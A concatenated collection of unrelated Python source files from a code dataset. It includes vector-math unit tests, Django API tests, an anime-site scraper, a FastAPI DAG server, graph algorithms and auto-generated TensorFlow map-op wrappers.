assert Vec2(11, 2.1) % Vec2(2, -1) == (1,0.1)
def test_mod5():
import numpy as np
assert Vec2(11, 2.1) % np.array([2, -1]) == (1,0.1)
def test_mod11():
assert 13 % Vec2(3, 5) == (1,3)
def test_mod21():
assert (13, 10) % Vec2(3, 4) == (1,2)
def test_mod31():
assert [13, 9] % Vec2(3, 4) == (1,1)
def test_imod1():
v = Vec2(13, 12)
v %= Vec2(3, 5)
assert v == Vec2(1, 2)
def test_imod2():
v = Vec2(13, 12)
v %= (3, 5)
assert v == (1, 2)
def test_imod3():
v = Vec2(13, 17)
v %= 3
assert v == (1, 2)
def test_imod4():
v = Vec2(13, 24)
v %= [3, 10]
assert v == [1, 4]
def test_imod5():
import numpy as np
v = Vec2(13, 24)
v %= np.array([3, 10])
assert v == (1, 4)
def test_len1():
v = Vec2(10,0)
assert v.len() == approx(10)
assert v.len_sqared() == approx(100)
def test_len2():
v = Vec2(0,-10)
assert v.len() == approx(10)
assert v.len_sqared() == approx(100)
def test_len3():
v = Vec2(10,10)
assert v.len() == approx(10*2**0.5)
assert v.len_sqared() == approx(200)
def test_abs1():
v = Vec2(-2,-3)
assert v.abs() == abs(v)
assert v.abs() == (2,3)
def test_abs2():
v = Vec2(2,-3)
assert v.abs() == abs(v)
assert v.abs() == (2,3)
def test_abs3():
v = Vec2(-2,3)
assert v.abs() == abs(v)
assert v.abs() == (2,3)
def test_abs4():
v = Vec2(2,3)
assert v.abs() == abs(v)
assert v.abs() == (2,3)
def test_norm1():
v = Vec2(10,0)
assert v.norm() == (1,0)
def test_norm2():
v = Vec2(10,0)
assert v.norm() == (1,0)
def test_norm3():
v = Vec2(0,10)
assert v.norm() == (0,1)
def test_norm4():
import numpy as np
for i in range(1000):
v = Vec2(np.random.uniform(-9999, 9999),np.random.uniform(-9999, 9999))
assert v.norm().len() == approx(1)
def test_round1():
v = Vec2(1.2345678, -4.56789)
assert v.round() == (1,-5)
assert v.round(1) == (1.2,-4.6)
assert v.round(5) == (1.23457,-4.56789)
assert v.round(10) == v
def test_ceil1():
v = Vec2(1.2345678, -4.56789)
assert v.ceil() == (2,-4)
assert v.ceil(1) == (1.3,-4.5)
assert v.ceil(5) == (1.23457,-4.56789)
assert v.ceil(10) == v
def test_floor1():
v = Vec2(1.2345678, -4.56789)
assert v.floor() == (1,-5)
assert v.floor(1) == (1.2,-4.6)
assert v.floor(5) == (1.23456,-4.56789)
assert v.floor(10) == v
def test_trunc1():
v = Vec2(1.2345678, -4.56789)
assert v.trunc() == (1,-4)
assert v.trunc(1) == (1.2,-4.5)
assert v.trunc(5) == (1.23456,-4.56789)
assert v.trunc(10) == v
def test_cross1():
v = Vec2(10,20)
assert v & (1,2) == approx(0)
assert v & (-1,-2) == approx(0)
assert (-1,-2) & v == approx(0)
assert [-1,-2] & v == approx(0)
def test_cross2():
v1 = Vec2(10,20).norm()
v2 = Vec2(-200,100).norm()
assert v1 & v2 == approx(1)
assert v2 & v1 == approx(-1)
def test_angle_to1():
v1 = Vec2(10,20)
v2 = Vec2(-200,100)
assert v1.angle_to(v2, 1) == approx(90)
assert v2.angle_to(v1, 1) == approx(-90)
def test_rotate1():
v = Vec2(10,0)
assert v.rotate(90, 1) == (0, 10)
assert v.rotate(-90, 1) == (0, -10)
assert v.rotate(180, 1) == (-10, 0)
assert v.rotate(-180, 1) == (-10, 0)
def test_rotate2():
v = Vec2(10,0)
assert v.rotate(360, 1) == (10, 0)
assert v.rotate(-360, 1) == (10, 0)
assert v.rotate(270, 1) == (0, -10)
assert v.rotate(-270, 1) == (0, 10)
| StarcoderdataPython |
4877353 | <gh_stars>10-100
from .pynnotator import Pynnotator
| StarcoderdataPython |
8032729 | # -*- coding: utf-8 -*-
from helper_functions.main_script_NDL import Generate_all_dictionary, Generate_corrupt_and_denoising_results, compute_all_recons_scores
from helper_functions.final_plots_display import diplay_ROC_plots, all_dictionaries_display, top_dictionaries_display, all_dictionaries_display_rank, recons_display, recons_display_simple, few_dictionaries_display
# This script generates all figures in
# <NAME>, <NAME>, <NAME>, and <NAME>
# Learning low-rank latent mesoscale structures in networks (2020)
# output files will be saved in Network_dictionary/test
# First add network files for UCLA, Caltech, MIT, Harvard to Data/Networks_all_NDL
# Ref: <NAME>, <NAME>, <NAME>, and <NAME>.
# Comparing community structure tocharacteristics in online collegiate social networks.SIAM Review, 53:526–543, 2011.
# Run main script to generate dictionary files and individual plots
# diplay_ROC_plots(path="Network_dictionary/NDL_denoising_1")
# recons_display()
# few_dictionaries_display(["Caltech36.txt", "MIT8.txt", "Harvard1.txt", "UCLA26.txt"])
# Generate_all_dictionary()
# Generate Figures 2 and 7
# top_dictionaries_display(motif_sizes=[6, 11, 21, 51, 101], latent_motif_rank=2)
# top_dictionaries_display(motif_sizes=[6, 11, 21, 51, 101], latent_motif_rank=1)
# Run main script to perform reconstruction and compute accuracy scores
# compute_all_recons_scores()
# Generate Figure 3
"""
recons_display()
# Generate Figures 8, 11
list_network_files = ['Caltech36.txt',
'MIT8.txt',
'UCLA26.txt',
'Harvard1.txt']
all_dictionaries_display(list_network_files, motif_sizes = [6, 11, 21, 51, 101] , name='1')
all_dictionaries_display_rank(list_network_files, name='1')
# Generate Figures 9, 12
list_network_files = ['COVID_PPI.txt',
'facebook_combined.txt',
'arxiv.txt',
'node2vec_homosapiens_PPI.txt']
all_dictionaries_display(list_network_files, motif_sizes = [6, 11, 21, 51, 101] , name='1')
all_dictionaries_display_rank(list_network_files, name='2')
"""
# Generate Figures 10, 13
list_network_files = ['true_edgelist_for_ER_5000_mean_degree_50.txt',
'true_edgelist_for_ER_5000_mean_degree_100.txt']
list_network_files = ['true_edgelist_for_SW_5000_k_50_p_0.05.txt',
'true_edgelist_for_SW_5000_k_50_p_0.1.txt',
'true_edgelist_for_BA_5000_m_25.txt',
'true_edgelist_for_BA_5000_m_50.txt']
list_network_files = ['Caltech36.txt',
'MIT8.txt',
'UCLA26.txt',
'Harvard1.txt']
list_network_files = ['COVID_PPI.txt',
'facebook_combined.txt',
'arxiv.txt',
'node2vec_homosapiens_PPI.txt']
# all_dictionaries_display(list_network_files, motif_sizes = [6, 11, 21, 51, 101] , name='4')
all_dictionaries_display_rank(list_network_files, name='1')
# Run main script to generate ROC files for denoising experiments
Generate_corrupt_and_denoising_results()
# Properly modify the ROC file paths in helper_functions.final_plots_display.display_ROC_plots
# using the file names generated (all starts with "ROC_dict")
# Generate Figure 4 (latex table is separate)
diplay_ROC_plots(path = "Network_dictionary/NDL_denoising_1")
| StarcoderdataPython |
11214422 | <filename>800/19_05_2021/469A.py
def main():
lst1 = 'I become the guy.'
lst2 = 'Oh, my keyboard!'
n = int(input())
p = input().split()[1:]
q = input().split()[1:]
set_pq = set(p+q)
if len(set_pq) == n:
print(lst1)
else:
print(lst2)
if __name__ == "__main__":
main()
# n=int(input())
# x=input().split()[1:]
# y=input().split()[1:]
# print(['Oh, my keyboard!','I become the guy.'][len(set(x+y))==n])
# ------------------------------------------------------------
# print('I become the guy.' if int(input()) <= len(set(input()[1:].split()) | set(input()[1:].split())) else 'Oh, my keyboard!')
# --------------------------------------------------------
#a=input;print("IO hb,e cmoym ek etyhbeo agrudy!."[int(a())>len(set(a().split()[1:]+a().split()[1:]))::2])
| StarcoderdataPython |
9798343 | import json
from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APIClient
from openslides import __version__ as version
from openslides.core.config import ConfigVariable, config
from openslides.core.models import CustomSlide, Projector
from openslides.utils.rest_api import ValidationError
from openslides.utils.test import TestCase
class ProjectorAPI(TestCase):
"""
Tests requests from the anonymous user.
"""
def test_slide_on_default_projector(self):
self.client.login(username='admin', password='<PASSWORD>')
customslide = CustomSlide.objects.create(title='title_que1olaish5Wei7que6i', text='text_aishah8Eh7eQuie5ooji')
default_projector = Projector.objects.get(pk=1)
default_projector.config = {
'<KEY>': {'name': 'core/customslide', 'id': customslide.id}}
default_projector.save()
response = self.client.get(reverse('projector-detail', args=['1']))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content.decode()), {
'id': 1,
'elements': {
'<KEY>':
{'id': customslide.id,
'uuid': '<KEY>',
'name': 'core/customslide'}},
'scale': 0,
'scroll': 0})
def test_invalid_slide_on_default_projector(self):
self.client.login(username='admin', password='<PASSWORD>')
default_projector = Projector.objects.get(pk=1)
default_projector.config = {
'fc6ef43b624043068c8e6e7a86c5a1b0': {'name': 'invalid_slide'}}
default_projector.save()
response = self.client.get(reverse('projector-detail', args=['1']))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(json.loads(response.content.decode()), {
'id': 1,
'elements': {
'fc6ef43b624043068c8e6e7a86c5a1b0':
{'name': 'invalid_slide',
'uuid': 'fc6ef43b624043068c8e6e7a86c5a1b0',
'error': 'Projector element does not exist.'}},
'scale': 0,
'scroll': 0})
class VersionView(TestCase):
"""
Tests the version info view.
"""
def test_get(self):
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.get(reverse('core_version'))
self.assertEqual(json.loads(response.content.decode()), {
'openslides_version': version,
'plugins': [
{'verbose_name': 'OpenSlides Test Plugin',
'description': 'This is a test plugin for OpenSlides.',
'version': 'unknown'}]})
class ConfigViewSet(TestCase):
"""
Tests requests to deal with config variables.
"""
def setUp(self):
# Save the old value of the config object and add the test values
# TODO: Can be changed to setUpClass when Django 1.8 is no longer supported
self._config_values = config.config_variables.copy()
config.update_config_variables(set_simple_config_view_integration_config_test())
def tearDown(self):
# Reset the config variables
config.config_variables = self._config_values
def test_retrieve(self):
self.client.login(username='admin', password='<PASSWORD>')
config['test_var_aeW3Quahkah1phahCheo'] = 'test_value_Oovoojieme7eephaed2A'
response = self.client.get(reverse('config-detail', args=['test_var_aeW3Quahkah1phahCheo']))
self.assertEqual(
response.data,
{'key': 'test_var_aeW3Quahkah1phahCheo',
'value': 'test_value_Oovoojieme7eephaed2A'})
def test_update(self):
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_Xeiizi7ooH8Thuk5aida']),
{'value': 'test_value_Phohx3oopeichaiTheiw'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(config['test_var_Xeiizi7ooH8Thuk5aida'], 'test_value_Phohx3oopeichaiTheiw')
def test_update_wrong_datatype(self):
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_ohhii4iavoh5Phoh5ahg']),
{'value': 'test_value_string'})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'detail': "Wrong datatype. Expected <class 'int'>, got <class 'str'>."})
def test_update_wrong_datatype_that_can_be_converted(self):
"""
Try to send a string that can be converted to an integer to an integer
field.
"""
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_ohhii4iavoh5Phoh5ahg']),
{'value': '12345'})
self.assertEqual(response.status_code, 200)
def test_update_good_choice(self):
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_wei0Rei9ahzooSohK1ph']),
{'value': 'key_2_yahb2ain1aeZ1lea1Pei'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(config['test_var_wei0Rei9ahzooSohK1ph'], 'key_2_yahb2ain1aeZ1lea1Pei')
def test_update_bad_choice(self):
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_wei0Rei9ahzooSohK1ph']),
{'value': 'test_value_bad_string'})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'detail': 'Invalid input. Choice does not match.'})
def test_update_validator_ok(self):
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_Hi7Oje8Oith7goopeeng']),
{'value': 'valid_string'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(config['test_var_Hi7Oje8Oith7goopeeng'], 'valid_string')
def test_update_validator_invalid(self):
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_Hi7Oje8Oith7goopeeng']),
{'value': 'invalid_string'})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'detail': 'Invalid input.'})
def test_update_only_with_key(self):
self.client = APIClient()
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.put(
reverse('config-detail', args=['test_var_Xeiizi7ooH8Thuk5aida']))
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data, {'detail': 'Invalid input. Config value is missing.'})
def test_metadata_with_hidden(self):
self.client.login(username='admin', password='<PASSWORD>')
response = self.client.options(reverse('config-list'))
filter_obj = filter(
lambda item: item['key'] == 'test_var_pud2zah2teeNaiP7IoNa',
response.data['config_groups'][0]['subgroups'][0]['items'])
self.assertEqual(len(list(filter_obj)), 0)
def validator_for_testing(value):
"""
Validator for testing.
"""
if value == 'invalid_string':
raise ValidationError({'detail': 'Invalid input.'})
def set_simple_config_view_integration_config_test():
"""
Sets a simple config view with some config variables but without
grouping.
"""
yield ConfigVariable(
name='test_var_aeW3Quahkah1phahCheo',
default_value=None,
label='test_label_aeNahsheu8phahk8taYo')
yield ConfigVariable(
name='test_var_Xeiizi7ooH8Thuk5aida',
default_value='')
yield ConfigVariable(
name='test_var_ohhii4iavoh5Phoh5ahg',
default_value=0,
input_type='integer')
yield ConfigVariable(
name='test_var_wei0Rei9ahzooSohK1ph',
default_value='key_1_Queit2juchoocos2Vugh',
input_type='choice',
choices=(
{'value': 'key_1_Queit2juchoocos2Vugh', 'display_name': 'label_1_Queit2juchoocos2Vugh'},
{'value': 'key_2_yahb2ain1aeZ1lea1Pei', 'display_name': 'label_2_yahb2ain1aeZ1lea1Pei'}))
yield ConfigVariable(
name='test_var_Hi7Oje8Oith7goopeeng',
default_value='',
validators=(validator_for_testing,))
yield ConfigVariable(
name='test_var_pud2zah2teeNaiP7IoNa',
default_value=None,
label='test_label_xaing7eefaePheePhei6',
hidden=True)
| StarcoderdataPython |
4869749 | <filename>google_problems/problem_69.py
"""This problem was asked by Google.
A regular number in mathematics is defined as one which evenly divides some power of 60.
Equivalently, we can say that a regular number is one whose only prime divisors are 2, 3, and 5.
These numbers have had many applications, from helping ancient Babylonians keep time to
tuning instruments according to the diatonic scale.
Given an integer N, write a program that returns, in order, the first N regular numbers.
""" | StarcoderdataPython |
1904314 | ## factory boy
import factory
# Own
from portfolio.models import Account
class AccountFactory(factory.django.DjangoModelFactory):
"""
Factory for creating accounts
"""
class Meta:
model = Account
# Account name by default will be 'Account 1' for the first created
# account, 'Account 2' for the next and so on
name = factory.Sequence(lambda n: 'Account {0}'.format(n))
base_currency = 'EUR'
| StarcoderdataPython |
1967649 | # coding=utf-8
import requests
from bs4 import BeautifulSoup as bs
class ImomoeClientMainPage(object):
def __init__(self):
self.base_url = "http://www.imomoe.in"
r = requests.get(self.base_url)
self.mp_html = r.content
self.soup = bs(self.mp_html, "lxml")
self.all_div = self.soup.find_all("div")
self.focus_div = self.all_div[9]
self.area_box_div = self.all_div[15]
self.type_box_div = self.all_div[17]
self.lang_box_div = self.all_div[18]
self.latest_more_url = self.all_div[24].span.a["href"]
self.latest_info_div = self.all_div[25]
self.japan_more_url = self.all_div[27].span.a["href"]
self.japan_info_div = self.all_div[28]
self.chinese_more_url = self.all_div[30].span.a["href"]
self.chinese_info_div = self.all_div[31]
def get_focus_list(self):
"""
获取热门番剧列表
"""
focus = self.focus_div.select("li")
focus_result = []
for i in focus:
result = {}
result["title"] = i.a["title"]
result["href"] = i.a["href"]
result["img"] = i.img["src"]
result["info"] = i.em.string
focus_result.append(result)
return focus_result
def get_latest_list(self):
"""
获取最新番剧列表
"""
latest = self.latest_info_div.select("li")
latest_result = []
for i in latest:
result = {}
result["title"] = i.select("p")[0].a["title"]
result["href"] = self.base_url + i.a["href"]
result["img"] = i.img["src"]
result["info"] = i.select("p")[1].string
latest_result.append(result)
return latest_result
def get_japan_anime_list(self):
"""
获取日本番剧列表
"""
japan_anime = self.japan_info_div.select("li")
japan_anime_result = []
for i in japan_anime:
result = {}
result["title"] = i.select("p")[0].a["title"]
result["href"] = self.base_url + i.a["href"]
result["img"] = i.img["src"]
result["info"] = i.select("p")[1].string
japan_anime_result.append(result)
return japan_anime_result
def get_chinese_anime_list(self):
"""
获取国产动漫列表
"""
chinese_anime = self.chinese_info_div.select("li")
chinese_anime_result = []
for i in chinese_anime:
result = {}
result["title"] = i.select("p")[0].a["title"]
result["href"] = self.base_url + i.a["href"]
result["img"] = i.img["src"]
result["info"] = i.select("p")[1].string
chinese_anime_result.append(result)
return chinese_anime_result
def get_top_new_list(self):
"""
获取最新更新的所有番剧
"""
r = requests.get("http://www.imomoe.in/top/new.html")
soup = bs(r.content, "lxml")
topli_div = soup.find_all(attrs={"class": "topli"})[0]
topli = topli_div.select("li")
topli_result = []
for i in topli:
result = {}
info = i.select("a")
result["title"] = info[1]["title"]
result["href"] = self.base_url + info[1]["href"]
result["info"] = info[2].string
result["time"] = i.em.string
topli_result.append(result)
return topli_result
| StarcoderdataPython |
9767223 | # Third party code
#
# The following code are copied or modified from:
# https://github.com/google-research/motion_imitation
# Lint as: python3
"""Defines the minitaur robot related constants and URDF specs."""
LEG_ORDER = ["front_left", "back_left", "front_right", "back_right"]
| StarcoderdataPython |
11359697 | import sys
from PyQt5.QtWidgets import *
class MyWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setGeometry(300, 300, 400, 300)
self.line_edit1 = QLineEdit(self)
self.line_edit1.move(10, 10)
self.line_edit1.resize(200, 30)
app = QApplication(sys.argv)
win = MyWindow()
win.show()
app.exec_() | StarcoderdataPython |
1784731 | """
Problem Statement:
- The concept of loops or cycles is very common in graph theory.
A cycle exists when you traverse the directed graph and come upon a vertex
that has already been visited.
You have to implement the detect_cycle function which tells you
whether or not a graph contains a cycle.
Input:
- A directed graph.
Output:
- True if a cycle exists. False if it doesn’t.
Sample Input:
graph = {
0 -> 1
1 -> 2
2 -> 0
}
Sample Output:
- True
"""
from collections import deque
from Graph import Graph
def detect_cycle(g):
visited = [False] * g.vertices
q = deque()
q.append(0)
while q:
v = q.pop()
if visited[v]:
return True
visited[v] = True
adjacent = g.array[v].get_head()
while adjacent:
q.append(adjacent.data)
adjacent = adjacent.next_element
return False
if __name__ == '__main__':
g1 = Graph(4)
g1.add_edge(0, 1)
g1.add_edge(1, 2)
g1.add_edge(1, 3)
g1.add_edge(3, 0)
g2 = Graph(3)
g2.add_edge(0, 1)
g2.add_edge(1, 2)
print(detect_cycle(g1))
print(detect_cycle(g2))
| StarcoderdataPython |
300212 | import json
from typing import Optional
import uvicorn
import yaml
from fastapi import FastAPI
from pydantic import BaseModel, Field
from typhoon.core.components import Component
from typhoon.core.dags import IDENTIFIER_REGEX, Granularity, DAGDefinitionV2, TaskDefinition, add_yaml_representers
from typhoon.core.glue import load_components, load_component
from typhoon.core.settings import Settings
from typhoon.deployment.packaging import build_all_dags
app = FastAPI()
@app.get("/api/v1/health-check")
def health_check():
return 'Ok'
@app.get("/api/v1/components")
def get_components():
typhoon_components = {
component.name: 'typhoon'
for component, _ in load_components(kind='typhoon')
}
local_components = {
component.name: 'components'
for component, _ in load_components(kind='custom')
}
return {'components': {**typhoon_components, **local_components}}
@app.get("/api/v1/component/{component_name}")
def get_component(component_name: str) -> Optional[Component]:
component = load_component(component_name)
return component
@app.get("/api/v1/component-args-schema/{component_name}")
def get_component_args_schema(component_name: str) -> Optional[Component]:
pass
@app.get("/api/v1/variables")
def get_variables():
return {'variables': Settings.metadata_store().get_variables()}
@app.get("/api/v1/connections")
def get_variables():
return {'connections': Settings.metadata_store().get_connections()}
class BuildArgs(BaseModel):
name: str = Field(..., regex=IDENTIFIER_REGEX, description='Name of your DAG')
schedule_interval: str = Field(
...,
regex='(' + '@hourly|@daily|@weekly|@monthly|@yearly|' +
r'((\*|\?|\d+((\/|\-){0,1}(\d+))*)\s*){5,6}' + '|' +
r'rate\(\s*1\s+minute\s*\)' + '|' +
r'rate\(\s*\d+\s+minutes\s*\)' + '|' +
r'rate\(\s1*\d+\s+hour\s*\)' + '|' +
r'rate\(\s*\d+\s+hours\s*\)' + '|' +
')',
description='Schedule or frequency on which the DAG should run'
)
granularity: Optional[Granularity] = Field(default=None, description='Granularity of DAG')
base_component: str = Field(..., regex=IDENTIFIER_REGEX, description='Name of base component')
component_arguments: dict = Field(..., description='Arguments for base component')
@app.post("/api/v1/dag-from-component")
def dag_from_component(build_args: BuildArgs):
dag = DAGDefinitionV2(
name=build_args.name,
schedule_interval=build_args.schedule_interval,
granularity=build_args.granularity,
tasks={
'flow': TaskDefinition(
component=build_args.base_component,
args=build_args.component_arguments
)
}
)
return dag
@app.put("/api/v1/dag")
def create_dag(dag: DAGDefinitionV2):
dag_file = Settings.dags_directory / f'{dag.name}.yml'
add_yaml_representers(yaml.SafeDumper)
dag_yaml = yaml.safe_dump(dag.dict())
dag_file.write_text(dag_yaml)
return str(dag_file)
@app.put("/api/v1/dags-build")
def build_dags():
build_all_dags(remote=None)
return 'Ok'
def run_api():
uvicorn.run(app, host="0.0.0.0", port=8000)
if __name__ == '__main__':
run_api()
| StarcoderdataPython |
1741690 | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: map_ops.cc
"""
import collections
from tensorflow.python import pywrap_tfe as pywrap_tfe
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from typing import TypeVar
@_dispatch.add_dispatch_list
@tf_export('empty_tensor_map')
def empty_tensor_map(name=None):
r"""Creates and returns an empty tensor map.
handle: an empty tensor map
Args:
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "EmptyTensorMap", name)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return empty_tensor_map_eager_fallback(
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
empty_tensor_map, (), dict(name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"EmptyTensorMap", name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
empty_tensor_map, (), dict(name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ()
_inputs_flat = _op.inputs
_execute.record_gradient(
"EmptyTensorMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
EmptyTensorMap = tf_export("raw_ops.EmptyTensorMap")(_ops.to_raw_op(empty_tensor_map))
def empty_tensor_map_eager_fallback(name, ctx):
_inputs_flat = []
_attrs = None
_result = _execute.execute(b"EmptyTensorMap", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"EmptyTensorMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_erase')
def tensor_map_erase(input_handle, key, value_dtype, name=None):
r"""Returns a tensor map with item from given key erased.
input_handle: the original map
output_handle: the map with value from given key removed
key: the key of the value to be erased
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value_dtype: A `tf.DType`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapErase", name, input_handle, key, "value_dtype",
value_dtype)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_erase_eager_fallback(
input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_erase, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
value_dtype = _execute.make_type(value_dtype, "value_dtype")
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapErase", input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_erase, (), dict(input_handle=input_handle, key=key,
value_dtype=value_dtype, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"), "value_dtype",
_op._get_attr_type("value_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapErase", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapErase = tf_export("raw_ops.TensorMapErase")(_ops.to_raw_op(tensor_map_erase))
def tensor_map_erase_eager_fallback(input_handle, key, value_dtype, name, ctx):
value_dtype = _execute.make_type(value_dtype, "value_dtype")
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype, "value_dtype", value_dtype)
_result = _execute.execute(b"TensorMapErase", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapErase", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_has_key')
def tensor_map_has_key(input_handle, key, name=None):
r"""Returns whether the given key exists in the map.
input_handle: the input map
key: the key to check
has_key: whether the key is already in the map or not
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `bool`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapHasKey", name, input_handle, key)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_has_key_eager_fallback(
input_handle, key, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"TensorMapHasKey", input_handle=input_handle, key=key, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_has_key, (), dict(input_handle=input_handle, key=key,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("key_dtype", _op._get_attr_type("key_dtype"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"TensorMapHasKey", _inputs_flat, _attrs, _result)
_result, = _result
return _result
TensorMapHasKey = tf_export("raw_ops.TensorMapHasKey")(_ops.to_raw_op(tensor_map_has_key))
def tensor_map_has_key_eager_fallback(input_handle, key, name, ctx):
_attr_key_dtype, (key,) = _execute.args_to_matching_eager([key], ctx, [])
input_handle = _ops.convert_to_tensor(input_handle, _dtypes.variant)
_inputs_flat = [input_handle, key]
_attrs = ("key_dtype", _attr_key_dtype)
_result = _execute.execute(b"TensorMapHasKey", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"TensorMapHasKey", _inputs_flat, _attrs, _result)
_result, = _result
return _result
@_dispatch.add_dispatch_list
@tf_export('tensor_map_insert')
def tensor_map_insert(input_handle, key, value, name=None):
r"""Returns a map that is the 'input_handle' with the given key-value pair inserted.
input_handle: the original map
output_handle: the map with key and value inserted
key: the key to be inserted
value: the value to be inserted
Args:
input_handle: A `Tensor` of type `variant`.
key: A `Tensor`.
value: A `Tensor`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "TensorMapInsert", name, input_handle, key, value)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return tensor_map_insert_eager_fallback(
input_handle, key, value, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
tensor_map_insert, (), dict(input_handle=input_handle, key=key,
value=value, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
